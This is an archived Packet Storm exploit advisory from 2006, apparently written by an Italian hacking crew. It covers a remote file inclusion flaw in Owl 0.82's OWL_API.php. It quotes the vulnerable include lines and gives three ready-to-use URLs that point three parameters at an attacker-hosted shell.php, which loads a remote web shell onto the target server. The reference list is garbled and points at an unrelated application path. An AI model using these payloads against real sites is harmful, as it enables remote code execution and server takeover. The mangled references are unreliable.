Owl0.82.txt

2006-10-04T00:00:00
ID PACKETSTORM:50601
Type packetstorm
Reporter Drago84
Modified 2006-10-04T00:00:00

Description

                                        
                                            ` ###### ToXiC #########################  
#  
#Owl 0.82 Remote File Inclusion by ToXiC CreW  
#  
#BuG FounD by Drago84  
#  
#Application Affect:Owl 0.82  
#Page:  
# OWL_API.php  
#Dir :  
# /lib/  
#Problem:  
# global $owl_location;  
# global $xrms_file_root;  
# global $include_directory;  
# require_once($xrms_file_root . '/include-locations.inc');  
# require_once($include_directory . '/adodb/adodb.inc.php');  
# require_once($owl_location . '/lib/pclzip/pclzip.lib.php');  
# ExPloit :  
#[1]http://www.site.com/owl_dir/lib/OWL_API.php?include_directory=[2]h  
ttp://marcusbestlamer.gay/shell.php?  
#[3]http://www.site.com/owl_dir/lib/OWL_API.php?xrms_file_root=[4]http  
://marcusbestlamer.gay/shell.php?  
#[5]http://www.site.com/owl_dir/lib/OWL_API.php?[6]owl_location=[7]htt  
p://marcusbestlamer.gay/shell.php?  
#  
#  
GrEatZ All Member of ToXiC, Str0ke  
#  
#  
#FUCK #Sonic  
#  
# ToXic Security Italian CreW  
###### ToXiC ##########  
  
References  
  
1. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION  
2. unknown://unknown//unknown://unknown:/Redirect/marcusbestlamer.gay/shell.php?  
3. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION  
4. unknown://unknown//unknown://unknown:/Redirect/marcusbestlamer.gay/shell.php?  
5. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION  
6. unknown://unknown//unknown://unknown:/Redirect/www.site.com/polaring_dir/view/general.php?_SESSION  
7. unknown://unknown//unknown://unknown:/Redirect/marcusbestlamer.gay/shell.php?  
`